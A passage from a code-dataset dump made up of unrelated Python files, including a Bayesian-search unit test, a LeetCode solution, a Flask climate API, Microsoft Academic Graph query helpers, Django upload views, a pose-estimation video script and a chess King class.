self.json_string\n","sub_path":"venv/Lib/site-packages/emailverifier/models/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"409289564","text":"import pathlib\n\nimport ray\nimport shutil\nimport sys\nimport unittest\n\nimport os\nimport tempfile\nfrom axolotl.backend.ray import RayRunner\n\nfrom axolotl.algorithms.bayesian_search import BayesianSearch\nfrom axolotl.backend.simple import SimpleRunner\n\nPROJECT_ROOT = os.path.join(os.path.dirname(__file__), '..')\nsys.path.insert(0, PROJECT_ROOT)\n\nfrom d3m.metadata import problem as problem_module\nfrom d3m import container as container_module\nfrom axolotl.utils import pipeline as pipeline_utils\n\n\nclass TestBayesianSearch(unittest.TestCase):\n def setUp(self):\n self.test_data = os.path.join(PROJECT_ROOT, 'tests', 'data')\n dataset_name = 'iris_dataset_1'\n problem = self.__get_problem(dataset_name)\n self.problem = problem\n self.dataset = self.__get_dataset(dataset_name)\n self.test_dir = tempfile.mkdtemp()\n backend = SimpleRunner(random_seed=42, volumes_dir=None, scratch_dir=self.test_dir)\n self.tuner_base = BayesianSearch(problem, backend=backend, max_trials=10, directory=self.test_dir,\n num_initial_points=5)\n\n def tearDown(self):\n shutil.rmtree(self.test_dir)\n\n def test_fit(self):\n _, pipeline_result = self.tuner_base.search_fit(input_data=[self.dataset], time_limit=60)\n self.assertEqual(pipeline_result.error, None)\n\n def test_fit_svc(self):\n pipeline_info = os.path.join(os.path.dirname(__file__), 'resources', 'svc_pipeline.json')\n pipeline = pipeline_utils.load_pipeline(pipeline_info)\n _, pipeline_result = self.tuner_base.search_fit(input_data=[self.dataset], time_limit=60,\n pipeline_candidates=[pipeline])\n self.assertEqual(pipeline_result.error, None)\n\n def test_fit_lr(self):\n pipeline_info = os.path.join(os.path.dirname(__file__), 'resources', 'logistic_regeression.json')\n pipeline = pipeline_utils.load_pipeline(pipeline_info)\n _, pipeline_result = self.tuner_base.search_fit(input_data=[self.dataset], time_limit=60,\n pipeline_candidates=[pipeline])\n self.assertEqual(pipeline_result.error, None)\n\n def test_fit_ray(self):\n if not ray.is_initialized():\n ray.init()\n backend = RayRunner(random_seed=42, volumes_dir=None, scratch_dir=self.test_dir)\n tuner_base = BayesianSearch(self.problem, backend=backend, max_trials=30, directory=self.test_dir,\n num_initial_points=5)\n _, pipeline_result = tuner_base.search_fit(input_data=[self.dataset], time_limit=100)\n self.assertEqual(pipeline_result.error, None)\n ray.shutdown()\n\n def __get_uri(self, path):\n return pathlib.Path(os.path.abspath(path)).as_uri()\n\n def __get_problem(self, dataset_name):\n problem_path = os.path.join(\n self.test_data, 'problems', dataset_name.replace('dataset', 'problem'), 'problemDoc.json')\n problem_uri = self.__get_uri(problem_path)\n problem = problem_module.Problem.load(problem_uri)\n return problem\n\n def __get_dataset(self, dataset_name):\n dataset_path = os.path.join(\n self.test_data, 'datasets', dataset_name, 'datasetDoc.json')\n dataset_uri = self.__get_uri(dataset_path)\n dataset = container_module.dataset.get_dataset(dataset_uri)\n return dataset\n\n\nif __name__ == '__main__':\n suite = unittest.TestSuite()\n for test_case in (\n 'test_fit',\n 'test_fit_ray',\n 'test_fit_lr',\n 'test_fit_svc',\n ):\n suite.addTest(TestBayesianSearch(test_case))\n unittest.TextTestRunner(verbosity=2).run(suite)\n","sub_path":"tests/test_bayesian.py","file_name":"test_bayesian.py","file_ext":"py","file_size_in_byte":3729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"405258186","text":"import enum\nfrom typing import List\nclass Solution:\n def platesBetweenCandles(self, s: str, queries: List[List[int]]) -> List[int]:\n \"\"\"\n 前缀处理的方式不好,用len==s的长度来看\n ans = []\n isolation = []\n sum = 0\n for i,ch in enumerate(s):\n if ch=='|':\n sum+=1\n isolation.append((i,sum))\n if len(isolation)==0:\n for i in range(len(queries)):\n ans.append(0)\n return ans\n\n for (left,right) in queries:\n left_sum,right_sum=0,0\n for (pos,num) in isolation:\n if pos>=left:\n left = pos\n left_sum = num\n break\n for i in range(len(isolation)-1,-1,-1):\n if isolation[i][0]<=right:\n right = isolation[i][0]\n right_sum = isolation[i][1]\n break\n if left>=right:\n ans.append(0)\n else:\n ans.append((right-left-1)-(right_sum-left_sum-1)) \n return ans\n \"\"\"\n n = len(s)\n sumlist,sum= [0]*n,0 #任意位置处*的前缀数量和\n left,l = [0]*n,-1 #左侧最近'|'\n for i,ch in enumerate(s):\n if ch=='*':\n sum+=1\n else:\n l = i\n\n sumlist[i] = sum\n left[i] = l\n\n right,r = [0]*n,-1 #右侧最近'|'\n for i in range(n-1,-1,-1):\n if s[i]=='|':\n r = i\n right[i] = r\n\n ans = [0]*len(queries)\n for i,(x,y) in enumerate(queries):\n x = right[x] #左侧的pos取右边最近的'|'\n y = left[y]\n if x>=0 and y>=0 and x\", \"/api/v1.0//\"]\n return jsonify(out)\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n out = {}\n for row in measurements:\n out[row[1]] = row[2]\n return jsonify(out)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n out = []\n for row in stations_data:\n out.append(row[0])\n return jsonify(out)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n start_date = \"2016-08-23\"\n out = []\n for rows in measurements:\n if datetime.date.fromisoformat(start_date) <= datetime.date.fromisoformat(rows[1]):\n out.append(rows[3])\n return jsonify(out)\n\n@app.route(\"/api/v1.0/\")\ndef temp_stat_start(start):\n out = []\n for rows in measurements:\n if datetime.date.fromisoformat(start) <= datetime.date.fromisoformat(rows[1]):\n out.append(rows[3])\n return jsonify([min(out), sum(out)/len(out), max(out)])\n\n@app.route(\"/api/v1.0//\")\ndef temp_stat_startend(start, end):\n out = []\n for rows in measurements:\n if datetime.date.fromisoformat(start) <= datetime.date.fromisoformat(rows[1]) and datetime.date.fromisoformat(end) >= datetime.date.fromisoformat(rows[1]):\n out.append(rows[3])\n return jsonify([min(out), sum(out)/len(out), max(out)])\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"Flask_sqlalchemy_rest.py","file_name":"Flask_sqlalchemy_rest.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"164177285","text":"from alphabet_detector import AlphabetDetector\nfrom collections import defaultdict\nimport logging\nimport pandas as pd\nimport requests\nfrom retrying import retry\n\nfrom nesta.core.luigihacks import misctools\nfrom nesta.core.orms.orm_utils import get_mysql_engine\nfrom nesta.core.orms.mag_orm import FieldOfStudy\n\n\nENDPOINT = \"https://api.labs.cognitive.microsoft.com/academic/v1.0/evaluate\"\n\n\ndef prepare_title(title):\n \"\"\"Replaces non-alphanums from a paper title, allowing foreign characters and cleans\n up multiple spaces and trailing spaces.\n\n Args:\n title (str): the title of the paper\n\n Returns:\n (str): cleaned title\n \"\"\"\n detector = AlphabetDetector()\n if title is None:\n return \"\"\n result = \"\".join([x if len(detector.detect_alphabet(x)) > 0 or x.isnumeric()\n else \" \" for x in title.lower()])\n # Recursively remove spaces\n while \" \" in result:\n result = result.replace(\" \", \" \")\n # Remove trailing spaces\n if result[-1] == \" \":\n result = result[0:-1]\n return result\n\n\ndef build_expr(query_items, entity_name, max_length=16000):\n \"\"\"Builds and yields OR expressions for MAG from a list of items. Strings and\n integer items are formatted quoted and unquoted respectively, as per the MAG query\n specification.\n\n The maximum accepted query length for the api appears to be around 16,000 characters.\n\n Args:\n query_items (list): all items to be queried\n entity_name (str): the mag entity to be queried ie 'Ti' or 'Id'\n max_length (int): length of the expression which should not be exceeded. Yields\n occur at or below this expression length\n\n Returns:\n (str): expression in the format expr=OR(entity_name=item1, entity_name=item2...)\n \"\"\"\n expr = []\n length = 0\n query_prefix_format = \"expr=OR({})\"\n for item in query_items:\n if type(item) == str:\n formatted_item = f\"{entity_name}='{item}'\"\n elif type(item) == int:\n formatted_item = f\"{entity_name}={item}\"\n length = sum(len(e) + 1 for e in expr) + len(formatted_item) + len(query_prefix_format)\n if length >= max_length:\n yield query_prefix_format.format(','.join(expr))\n expr.clear()\n expr.append(formatted_item)\n\n # pick up any remainder below max_length\n if len(expr) > 0:\n yield query_prefix_format.format(','.join(expr))\n\n\n@retry(stop_max_attempt_number=10)\ndef query_mag_api(expr, fields, subscription_key, query_count=1000, offset=0):\n \"\"\"Posts a query to the Microsoft Academic Graph Evaluate API.\n\n Args:\n expr (str): expression as built by build_expr\n fields: (:obj:`list` of `str`): codes of fields to return, as per mag documentation\n query_count: (int): number of items to return\n offset (int): offset in the results if paging through them\n\n Returns:\n (dict): json response from the api containing 'expr' (the original expression)\n and 'entities' (the results) keys.\n If there are no results 'entities' is an empty list.\n \"\"\"\n headers = {\n 'Ocp-Apim-Subscription-Key': subscription_key,\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n query = f\"{expr}&count={query_count}&offset={offset}&attributes={','.join(fields)}\"\n\n r = requests.post(ENDPOINT, data=query.encode(\"utf-8\"), headers=headers)\n r.raise_for_status()\n\n return r.json()\n\n\ndef query_fields_of_study(subscription_key,\n ids=None,\n levels=None,\n fields=['Id', 'DFN', 'FL', 'FP.FId', 'FC.FId'],\n # id, display_name, level, parent_ids, children_ids\n query_count=1000,\n results_limit=None):\n \"\"\"Queries the MAG for fields of study. Expect >650k results for all levels.\n\n Args:\n subscription_key (str): MAG api subscription key\n ids: (:obj:`list` of `int`): field of study ids to query\n levels (:obj:`list` of `int`): levels to extract. 0 is highest, 5 is lowest\n fields (:obj:`list` of `str`): codes of fields to return, as per mag documentation\n query_count (int): number of items to return from each query\n results_limit (int): break and return as close to this number of results as the\n offset and query_count allow (for testing)\n\n Returns:\n (:obj:`list` of `dict`): processed results from the api query\n \"\"\"\n if ids is not None and levels is None:\n expr_args = (ids, 'Id')\n elif levels is not None and ids is None:\n expr_args = (levels, 'FL')\n else:\n raise TypeError(\"Field of study ids OR levels should be supplied\")\n\n field_mapping = {'Id': 'id',\n 'DFN': 'name',\n 'FL': 'level',\n 'FP': 'parent_ids',\n 'FC': 'child_ids'}\n fields_to_drop = ['logprob', 'prob']\n fields_to_compact = ['parent_ids', 'child_ids']\n\n for expr in build_expr(*expr_args):\n logging.info(expr)\n count = 1000\n offset = 0\n while True:\n fos_data = query_mag_api(expr, fields, subscription_key=subscription_key,\n query_count=count, offset=offset)\n if fos_data['entities'] == []:\n logging.info(\"Empty entities returned, no more data\")\n break\n\n # clean up and formatting\n for row in fos_data['entities']:\n for f in fields_to_drop:\n del row[f]\n\n for code, description in field_mapping.items():\n try:\n row[description] = row.pop(code)\n except KeyError:\n pass\n\n for field in fields_to_compact:\n try:\n row[field] = ','.join(str(ids['FId']) for ids in row[field])\n except KeyError:\n # no parents and/or children\n pass\n\n logging.info(f'new fos: {row}')\n yield row\n\n offset += len(fos_data['entities'])\n logging.info(offset)\n\n if results_limit is not None and offset >= results_limit:\n break\n\n\ndef dedupe_entities(entities):\n \"\"\"Finds the highest probability match for each title in returned entities from MAG.\n Args:\n entities (:obj:`list` of `dict`): entities from the MAG api\n\n Returns:\n (set): ids of entities with the highest probability score, one for each title\n \"\"\"\n titles = defaultdict(dict)\n for row in entities:\n titles[row['Ti']].update({row['Id']: row['logprob']})\n\n deduped_mag_ids = set()\n for title in titles.values():\n # find highest probability match for each title\n deduped_mag_ids.add(sorted(title, key=title.get, reverse=True)[0])\n\n return deduped_mag_ids\n\n\ndef update_field_of_study_ids(mag_subscription_key, session, fos_ids):\n logging.info(f\"Missing field of study ids: {fos_ids}\")\n logging.info(f\"Querying MAG for {len(fos_ids)} missing fields of study\")\n new_fos_to_import = [FieldOfStudy(**fos) for fos\n in query_fields_of_study(mag_subscription_key, ids=fos_ids)]\n logging.info(f\"Retrieved {len(new_fos_to_import)} new fields of study from MAG\")\n fos_not_found = fos_ids - {fos.id for fos in new_fos_to_import}\n if fos_not_found:\n raise ValueError(f\"Fields of study present in articles but could not be found in MAG Fields of Study database. New links cannot be created until this is resolved: {fos_not_found}\")\n\n session.add_all(new_fos_to_import)\n session.commit()\n logging.info(\"Added new fields of study to database\")\n\n\nif __name__ == \"__main__\":\n log_stream_handler = logging.StreamHandler()\n logging.basicConfig(handlers=[log_stream_handler, ],\n level=logging.INFO,\n format=\"%(asctime)s:%(levelname)s:%(message)s\")\n\n # collect api key from config\n mag_config = misctools.get_config('mag.config', 'mag')\n subscription_key = mag_config['subscription_key']\n\n # setup database connectors\n engine = get_mysql_engine(\"MYSQLDB\", \"mysqldb\", \"dev\")\n\n # *** query papers from arxiv titles\n df = pd.read_csv(\"/Users/russellwinch/Documents/data/arxiv_2017.csv\", nrows=1000)\n\n author_mapping = {'AuN': 'author_name',\n 'AuId': 'author_id',\n 'AfN': 'author_affiliation',\n 'AfId': 'author_affiliation_id',\n 'S': 'author_order'}\n\n field_mapping = {\"Id\": 'id',\n \"Ti\": 'title', # not needed\n \"F\": 'fields_of_study',\n \"AA\": 'authors',\n \"CC\": 'citation_count'}\n # query papers\n paper_fields = [\"Id\", \"Ti\", \"F.FId\", \"CC\", \"AA.AuN\", \"AA.AuId\",\n \"AA.AfN\", \"AA.AfId\", \"AA.S\"]\n for expr in build_expr(list(df.title.apply(prepare_title)), 'Ti', max_length=16000): # this .apply will take forever on the whole dataset. move to a generator\n # print(expr)\n data = query_mag_api(expr, paper_fields, subscription_key)\n # print(json.dumps(data['entities'][0], indent=4))\n print(f\"query length: {len(expr)}\")\n print(f\"titles in query: {len(expr.split(','))}\")\n print(f\"entities returned from api: {len(data['entities'])}\")\n\n break\n\n # *** extract field ids from papers\n # fids = set()\n # for entity in data['entities']:\n # for f in entity['F']:\n # fids.add(f['FId'])\n # print(fids)\n\n # query field ids\n # fos_fields = ['Id', 'DFN', 'FL', 'FP.FN']\n # for expr in build_expr(fids, 'Id'):\n # # print(expr)\n # fos_data = query_mag_api(expr, fos_fields)\n # print(fos_data)\n # break\n\n # *** extract list of ids\n # fos_level_fields = ['Id', 'DFN', 'FL', 'FP.FId', 'FC.FId'] # id, display_name, level, parent_ids, children_ids\n # for expr in build_expr([2909385909, 2911099694], 'Id'):\n # print(expr)\n # count = 1000\n # data = query_mag_api(expr, fos_level_fields, query_count=count)\n # print(data)\n","sub_path":"nesta/packages/mag/query_mag_api.py","file_name":"query_mag_api.py","file_ext":"py","file_size_in_byte":10340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"130665643","text":"from django.shortcuts import render\nfrom upload.models import Folder,File,Time\nfrom upload.forms import FolderForm,SearchForm,FileFormAPI,TimeForm\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nimport time\n\n# Create your views here.\n\n\ndef abc(request):\n\tprint(request.user)\n\tFolder.objects.create(name = 'abc')\n\treturn JsonResponse({'a' : 1},safe=False)\n\ndef rootfinder(request):\n\n\troot = Folder.objects.filter(parentfolder__isnull = True,author = request.user)\n\tif len(root) > 0:\n\t\troot = root[0]\n\telse:\n\t\troot = Folder.objects.create(name = request.user.username, author = request.user)\n\t\troot.save()\n\treturn JsonResponse({'root' : root.pk},safe=False)\n\n@csrf_exempt\ndef createfolder(request,parent_id):\n\tparent = Folder.objects.get(pk = parent_id)\n\n\tform = FolderForm(request.POST, request.FILES)\n\tif form.is_valid():\n\t\ttemp = form.save(commit = False)\n\t\ttemp.author = request.user\n\t\ttemp.parentfolder = parent\n\t\t# temp.save()\n\t\t# key = temp.pk\n\t\tlst = Folder.objects.filter(name = temp.name, parentfolder = parent, author = request.user)\n\t\tif len(lst) != 0:\n\t\t\tkey = lst[0].pk\n\t\t\treturn JsonResponse({'key':key,'status' : \"no\"},safe = False)\n\t\telse:\n\t\t\ttemp.save()\n\t\t\tkey = temp.pk\n\t\t\treturn JsonResponse({'key':key,'status' : \"yes\"},safe = False)\n\t\t# return JsonResponse({'key':key},safe = False)\n\telse:\n\t\treturn JsonResponse({\"error\"},safe = False)\n\n@csrf_exempt\ndef uploadfile(request,parent_id):\n\tparent = Folder.objects.get(pk = parent_id)\n\n\tform = FileFormAPI(request.POST, request.FILES)\n\tif form.is_valid():\n\t temp = form.save(commit = False)\n\t temp.author = request.user\n\t # temp.name = str(temp.file)\n\t temp.parentfolder = parent\n\t # temp.save()\n\t key = temp.pk\n\t print(\"goes here\")\n\t lst = File.objects.filter(name = temp.name, parentfolder = parent, author = request.user)\n\t print(lst)\n\t if len(lst) != 0:\n\t \tkey = lst[0].pk\n\t \tlst[0].delete()\n\t \ttemp.save()\n\t \treturn JsonResponse({'key':key,'status' : \"no\"},safe = False)\n\t else:\n\t \ttemp.save()\n\t \tkey = temp.pk\n\t \treturn JsonResponse({'key':key,'status' : \"yes\"},safe = False)\n\t # return JsonResponse({'key':key},safe = False)\n\telse:\n\t\tprint(\"no here\")\n\t\treturn JsonResponse({'error' : \"error\" },safe = False)\n\n\n@csrf_exempt\ndef filedownload(request,parent_id):\n\tparent = Folder.objects.get(pk = parent_id)\n\tfiles = File.objects.filter(parentfolder = parent,author = request.user)\n\n\tinfolist = []\n\n\tfor file in files:\n\t\tdicti = {}\n\t\tdicti['name'] = file.name\n\t\tdicti['file'] = str(file.file)\n\t\tdicti['md5sum'] = file.md5sum\n\t\tinfolist.append(dicti)\n\n\treturn JsonResponse({'info' : infolist},safe = False)\n\n@csrf_exempt\ndef folderlist(request,parent_id):\n\tparent = Folder.objects.get(pk = parent_id)\n\tfolders = Folder.objects.filter(parentfolder = parent,author = request.user)\n\n\tinfolist = []\n\n\tfor folder in folders:\n\t\tdicti = {}\n\t\tdicti['name'] = folder.name\n\t\tdicti['id'] = folder.pk\n\t\tinfolist.append(dicti)\n\ttry:\n\t\tparent_id = parent.parentfolder.pk\n\texcept:\n\t\ttemp = Folder.objects.filter(parentfolder__isnull = True, author = request.user)\n\t\tparent_id = temp[0].pk\n\n\treturn JsonResponse({'folderlist' : infolist,'parent' : parent_id},safe = False)\n\n@csrf_exempt\ndef get_time_info(request):\n\ttimes = Time.objects.filter(author = request.user)\n\tif len(times) < 1:\n\t\tprint(time.time())\n\t\ta = Time.objects.create(author = request.user, timestamp = time.time(), sync_allowed = \"1\")\n\t\ta.save()\n\t\treturn JsonResponse({'allowed' : a.sync_allowed, 'time' : a.timestamp}, safe = False)\n\telse:\n\t\treturn JsonResponse({'allowed' : times[0].sync_allowed, 'time' : times[0].timestamp} ,safe = False)\n\n@csrf_exempt\ndef update_time_info(request):\n\ttimes = Time.objects.filter(author = request.user)\n\ttimes[0].delete()\n\tform = TimeForm(request.POST)\n\tif form.is_valid():\n\t\ttemp = form.save(commit = False)\n\t\ttemp.author = request.user\n\t\ttemp.save()\n\t\treturn JsonResponse({'success' : \"success\"}, safe = False)\n\telse:\n\t\treturn JsonResponse({'error' : \"error\"},safe = False)\n\n\n\t\n\n\n\n","sub_path":"server/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"291747399","text":"'''\nCreated on May 5, 2013\n\n@author: zhouyang\n'''\nimport pprint\n\n\n\n\ndef construct_frame():\n phi_f = open('./parameters/phi.txt', 'r')\n psi_f = open('./parameters/psi.txt', 'r')\n omega_f = open('./parameters/omega.txt', 'r')\n doc_f = open('./exper/documents.txt', 'r')\n \n subject_data = phi_f.read()\n predicate_data = omega_f.read()\n object_data = psi_f.read()\n \n subjects = [ word.split('\\t') for word in subject_data.split('\\n')[:-1] ]\n predicates = [ word.split('\\t') for word in predicate_data.split('\\n')[:-1] ]\n objects = [ word.split('\\t') for word in object_data.split('\\n')[:-1] ]\n \n ## Sort subject, predicates, objects according to probability\n for i in range(len(subjects)):\n for j in range(len(subjects[0])):\n s = subjects[i][j]\n subjects[i][j] = s + ':' + str(j)\n for i in range(len(predicates)):\n for j in range(len(predicates[0])):\n s = predicates[i][j]\n predicates[i][j] = s + ':' + str(j)\n for i in range(len(objects)):\n for j in range(len(objects[0])):\n s = objects[i][j]\n objects[i][j] = s + ':' + str(j)\n \n for i in range(len(subjects)):\n subjects[i].sort(reverse=True)\n for i in range(len(predicates)):\n predicates[i].sort(reverse=True)\n for i in range(len(objects)):\n objects[i].sort(reverse=True)\n \n ## Saving subjects, predicates, objects\n subjects_f = open('./frames/subjects.txt', 'w')\n predicates_f = open('./frames/predicates.txt', 'w')\n objects_f = open('./frames/objects.txt', 'w')\n \n buf = ''\n for i in range(len(subjects)):\n for j in range(len(subjects[0])):\n buf += subjects[i][j]\n buf += '\\t'\n buf += '\\n'\n subjects_f.write(buf)\n \n buf = ''\n for i in range(len(predicates)):\n for j in range(len(predicates[0])):\n buf += predicates[i][j]\n buf += '\\t'\n buf += '\\n'\n predicates_f.write(buf)\n \n buf = ''\n for i in range(len(objects)):\n for j in range(len(objects[0])):\n buf += objects[i][j]\n buf += '\\t'\n buf += '\\n'\n objects_f.write(buf)\n \n doc_f.close()\n subjects_f.close()\n predicates_f.close()\n objects_f.close()\n phi_f.close()\n psi_f.close()\n omega_f.close()\n \n \n ## Saving frames\n num_frame = len(subjects)\n # frame = [[0]] * num_frame\n V = len(subjects[0])\n for i in range(num_frame):\n buf = ''\n for v in range(V):\n buf += subjects[i][v]\n buf += '\\t'\n buf += predicates[i][v]\n buf += '\\t'\n buf += objects[i][v]\n buf += '\\t'\n buf += '\\n'\n f_f = open('./frames/frame' + str(i) + '.txt', 'w')\n f_f.write(buf)\n f_f.close()\n\n ## Saving indx frames only\n frames = [ [[], [], []] ]* num_frame\n for i in range(num_frame):\n buf = ''\n for v in range(V):\n indx = subjects[i][v].split(':')[1]\n buf += indx\n frames[i][0].append(indx)\n buf += '\\t'\n indx = predicates[i][v].split(':')[1]\n buf += indx\n frames[i][1].append(indx)\n buf += '\\t'\n indx = objects[i][v].split(':')[1]\n buf += indx\n frames[i][2].append(indx)\n buf += '\\t'\n buf += '\\n'\n f_f = open('./frames/frame_index' + str(i) + '.txt', 'w')\n f_f.write(buf)\n f_f.close()\n \n\n\ndef construct_strict_frame():\n \"\"\"\n frames = [ frame ]*\n frame = [sbj, prd, obj]\n sub = {word: value}* \n prd = {word: value}*\n obj = {word: value}*\n \"\"\"\n doc_f = open('./tmp/documents.txt', 'r')\n frame_f = open('./tmp/frame.txt', 'r')\n phi_f = open('./tmp/phi.txt', 'r')\n psi_f = open('./tmp/psi.txt', 'r')\n omega_f = open('./tmp/omega.txt', 'r')\n theta_f = open('./tmp/theta.txt', 'r')\n \n frame_data = frame_f.read()\n document_data = doc_f.read() \n subject_data = phi_f.read()\n predicate_data = omega_f.read()\n object_data = psi_f.read()\n \n word_frames = [ frame.split('\\t') for frame in frame_data.split('\\n')[:-1] ]\n documents = [ doc.split('\\t') for doc in document_data.split('\\n')[:-1] ]\n subjects = [ word.split('\\t') for word in subject_data.split('\\n')[:-1] ]\n predicates = [ word.split('\\t') for word in predicate_data.split('\\n')[:-1] ]\n objects = [ word.split('\\t') for word in object_data.split('\\n')[:-1] ]\n \n num_frame = len(subjects)\n frames = [[{}, {}, {}]] * num_frame\n \n for i in range(len(word_frames)):\n s = int(documents[i][0])\n p = int(documents[i][1])\n o = int(documents[i][2])\n fs = int(word_frames[i][0])\n fp = int(word_frames[i][1])\n fo = int(word_frames[i][2])\n # The probability that sbj, prd or obj belongs to the frame\n sbj_prob = float(subjects[fs][s])\n prd_prob = float(predicates[fp][p])\n obj_prob = float(objects[fo][o])\n sbj_d = {s: sbj_prob}\n prd_d = {p: prd_prob}\n obj_d = {o: obj_prob}\n frames[fs][0].update(sbj_d)\n frames[fp][1].update(prd_d)\n frames[fo][2].update(obj_d)\n\n pprint.pprint(frames)\n doc_f.close()\n theta_f.close()\n frame_f.close()\n phi_f.close()\n psi_f.close()\n omega_f.close()\n\nif __name__ == '__main__':\n construct_frame()\n","sub_path":"postprocess.py","file_name":"postprocess.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"551761612","text":"import argparse\nimport logging\nimport sys\nimport time\n\nfrom tf_pose import common\nimport cv2\nimport numpy as np\nfrom tf_pose.estimator import TfPoseEstimator\nfrom tf_pose.networks import get_graph_path, model_wh\n\nlogger = logging.getLogger('TfPoseEstimatorRun')\nlogger.handlers.clear()\nlogger.setLevel(logging.DEBUG)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nformatter = logging.Formatter('[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s')\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='tf-pose-estimation run')\n parser.add_argument('--video', type=str, default='./images/p1.jpg')\n parser.add_argument('--model', type=str, default='cmu',\n help='cmu / mobilenet_thin / mobilenet_v2_large / mobilenet_v2_small')\n parser.add_argument('--resize', type=str, default='0x0',\n help='if provided, resize images before they are processed. '\n 'default=0x0, Recommends : 432x368 or 656x368 or 1312x736 ')\n parser.add_argument('--resize-out-ratio', type=float, default=4.0,\n help='if provided, resize heatmaps before they are post-processed. default=1.0')\n parser.add_argument('--mode', type=str, default=\"all\",\n help='all or triangle')\n parser.add_argument('--background', type=bool, default=True,\n help='True of False')\n\n args = parser.parse_args()\n\n w, h = model_wh(args.resize)\n if w == 0 or h == 0:\n e = TfPoseEstimator(get_graph_path(args.model), target_size=(432, 368))\n else:\n e = TfPoseEstimator(get_graph_path(args.model), target_size=(w, h))\n\n # estimate human poses from a single image !\n # image = common.read_imgfile(args.image, None, None)\n video_file = args.video\n cap = cv2.VideoCapture(video_file)\n fourcc = cv2.VideoWriter_fourcc(*'DIVX')\n output_filename = str(video_file)\n if args.mode == \"all\":\n output_filename = str(output_filename).replace(\".\", \"_all.\")\n elif args.mode == \"triangle\":\n output_filename = str(output_filename).replace(\".\", \"_triangle.\")\n if args.background :\n output_filename = str(output_filename).replace(\".\", \"_only_skel.\")\n print(output_filename)\n out = cv2.VideoWriter(output_filename, fourcc, 30.0, (int(cap.get(3)), int(cap.get(4))))\n\n frame_count = 0\n while cap.isOpened():\n ret_val, image = cap.read()\n frame_count+=1\n if ret_val == False :\n break\n t = time.time()\n humans = e.inference(image, resize_to_default=(w > 0 and h > 0), upsample_size=args.resize_out_ratio)\n elapsed = time.time() - t\n if frame_count % 10 == 0 :\n print(\"frame_count:\\t\" + str(frame_count))\n print('inference frame: %s in %.4f seconds.' % (frame_count, elapsed))\n if args.background :\n image = np.zeros(image.shape, np.uint8) + 255\n if args.mode == \"all\" :\n image = TfPoseEstimator.draw_humans(image, humans, imgcopy=False)\n if args.mode == \"triangle\":\n image = TfPoseEstimator.draw_triangle(image, humans, imgcopy=False)\n out.write(image)\n cap.release()\n out.release()\n cv2.destroyAllWindows()","sub_path":"run_video.py","file_name":"run_video.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"93508585","text":"from piece import Piece\n\nclass King(Piece):\n def __init__(self, color, x, y, board):\n super().__init__(color, x, y, board)\n self.rank = \"king\"\n self.has_moved = False\n self.check = False\n\n # Quick hack because castling is currently buggy when the CPU_player\n # tries to do it, so this disables castling for it. Still legal, because\n # you don't HAVE to castle :P\n if self.color == 'black': self.has_moved = True\n \n \"\"\"\n The runtime of the king's can_move_to function is O(1).\n \"\"\"\n def can_move_to(self, x, y):\n if (self.board[x, y].piece and\n self.board[x, y].piece.color == self.color):\n return False\n\n if (abs(self.x - x) < 2 and abs(self.y - y) < 2 and\n not (self.x == x and self.y == y)):\n return True\n\n back_row = 7 if self.color == 'white' else 0\n if not self.has_moved and not self.check: # check if can castle\n if ((x, y) == (6, back_row) and\n self.board[5, back_row].piece is None and\n self.board[6, back_row].piece is None and\n self.board[7, back_row].piece and\n self.board[7, back_row].piece.rank == 'rook' and not\n self.board[7, back_row].piece.has_moved):\n return \"kingside\"\n if ((x, y) == (2, back_row) and\n self.board[1, back_row].piece is None and\n self.board[2, back_row].piece is None and\n self.board[3, back_row].piece is None and\n self.board[0, back_row].piece and\n self.board[0, back_row].piece.rank == 'rook' and not\n self.board[0, back_row].piece.has_moved):\n return \"queenside\"\n\n return False\n \n \n def is_in_check(self):\n \"\"\"\n Runtime is O(n^3) in the worst case due to the tile.get_new_coverage()\n method.\n \"\"\"\n opponent = 'white' if (self.color == 'black') else 'black'\n\n self.board[self.x, self.y].get_new_coverage()\n\n return self.board[self.x, self.y].is_covered[opponent]\n\n","sub_path":"king.py","file_name":"king.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"296230767","text":"light_speed = 299792.458\nspeed = 16.9995\ndistance_from_sun_now = 21259598000\n\n# Programming problem 4(b)\ndef round_trip_time(day):\n \"\"\"Calculates the round-trip at a future date,\n which is a number of days after today\"\"\"\n time = day * 24 * 60 * 24\n # time sine started\n distance = distance_from_sun_now + speed * time\n communication_time = 2 * distance / light_speed\n return communication_time\n","sub_path":"labs/lab02/2.4 voyager.py","file_name":"2.4 voyager.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"369224623","text":"\"\"\" Chainer-based RNN implementations.\n\n Important Notes:\n * setting volatile to OFF during evaluation\n is a performance boost.\n\"\"\"\n\nimport numpy as np\nfrom spinn import util\n\n# Chainer imports\nimport chainer\nfrom chainer import cuda, Function, gradient_check, report, training, utils, Variable\nfrom chainer import datasets, iterators, optimizers, serializers\nfrom chainer import Link, Chain, ChainList\nimport 